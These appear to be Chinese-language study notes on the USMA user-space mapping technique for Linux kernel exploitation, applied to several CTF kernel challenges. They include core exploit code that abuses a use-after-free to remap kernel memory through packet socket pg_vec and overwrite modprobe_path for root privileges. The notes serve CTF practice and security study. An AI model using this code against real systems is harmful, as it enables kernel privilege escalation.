USMA(User-Space-Mapping-Attack)
允许普通用户进程可以映射内核态内存并且修改内核代码段,通过这个方法,我们可以绕过Linux内核中的CFI缓解措施,在内核态中执行任意代码
360漏洞研究院:USMA:用户态映射攻击
视频
文档
pwnhub 3月公开赛 - kheap
0x20 大小的 UAF,开启了 SMEP\KASLR
之前的方式是通过seq_operation结构体函数指针劫持 + 栈迁移,绕过SMEP
参考
下面链接使用的是USMA
参考
核心代码
int packet_fd = pagealloc_pad(0x20 / 8, 4096); // 什么分配4个0x1000大小page, struct pgv *pg_vec; 分配符合UAF大小0x20
read(fd, buf, 0x20);
binary_dump("pg_vec data", buf, 0x20);
*(size_t*)buf = modprobe_path - 0x2e0;
write(fd, buf, 0x20); // 对pg_vec中的虚拟地址进行覆写
char *page = NULL, *modprobe_path_ptr = NULL;
page = mmap(NULL, 0x1000*(0x20 / 8), PROT_READ|PROT_WRITE, MAP_SHARED, packet_fd, 0); // 通过pg_vec,把modprobe_path_ptr所在的页,映射到用户态
modprobe_path_ptr = page + 0x2e0;
puts(modprobe_path_ptr);
strcpy(modprobe_path_ptr, "/home/x");
【dir+USMA】NCTF2023 - x1key
也是0x20大小的UAF,没有读方法,不能泄露内核地址
参考
unshare_setup();
fd = open("/dev/x1key", O_RDONLY);
int shm_fd = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT|0666);
char* shm_ptr = shmat(shm_fd, NULL, SHM_RDONLY); // 申请0x20,要被上溢的slab
add(); // vuln slab
shmdt(shm_ptr); // 释放
int nr = 0x20 / 8;
int packet_fd = pagealloc_pad(nr, 0x1000); // 占据 shm_file_data
char *page = NULL, *modprobe_path = NULL;
for (int i = 0; i < 0x80; i++)
{
edit(0, (i<<20)|0x2a000); // 修改packet_fd中的pg_vec
page = mmap(NULL, 0x1000*nr, PROT_READ|PROT_WRITE, MAP_SHARED, packet_fd, 0);
if (page == -1) continue;
modprobe_path = page + 0x1000*(nr-1) + 0xc0;
if (!strcmp(modprobe_path, "/sbin/modprobe")) break;
munmap(page, 0x1000*nr);
}
strcpy(modprobe_path, "/tmp/x");
N1CTF 2022 praymoon
参考
这个是通过__sys_setresuid
进行提权的,单单USMA利用逻辑上和原始文章一致